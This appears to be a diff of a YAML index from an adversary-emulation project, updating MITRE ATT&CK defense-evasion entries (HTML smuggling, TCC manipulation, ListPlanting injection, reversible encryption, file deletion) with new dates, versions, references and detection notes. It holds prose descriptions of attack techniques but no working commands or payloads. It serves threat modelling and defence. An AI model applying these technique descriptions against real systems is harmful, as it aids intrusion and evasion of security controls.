         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -14116,48 +14439,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -14179,6 +14471,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -14189,23 +14482,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -14246,8 +14566,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -14283,43 +14604,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -14330,18 +14631,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests:
     - name: Delete a single file - FreeBSD/Linux/macOS
@@ -14469,7 +14788,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -14499,13 +14818,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -14602,7 +14919,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -14665,7 +14981,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests:
     - name: Binary simply packed by UPX
@@ -14745,7 +15060,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -14772,8 +15087,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -14801,7 +15114,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -14845,8 +15158,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -14901,7 +15212,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -14921,7 +15232,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -14971,7 +15281,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests:
     - name: Space After Filename (Manual)
@@ -15056,12 +15365,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -15111,12 +15419,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -15176,8 +15483,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -15194,37 +15501,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -15232,6 +15520,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -15239,7 +15529,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -15269,7 +15559,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -15315,7 +15604,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -15360,8 +15649,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -15406,7 +15693,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -15420,58 +15707,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -15488,6 +15745,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -15502,21 +15762,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
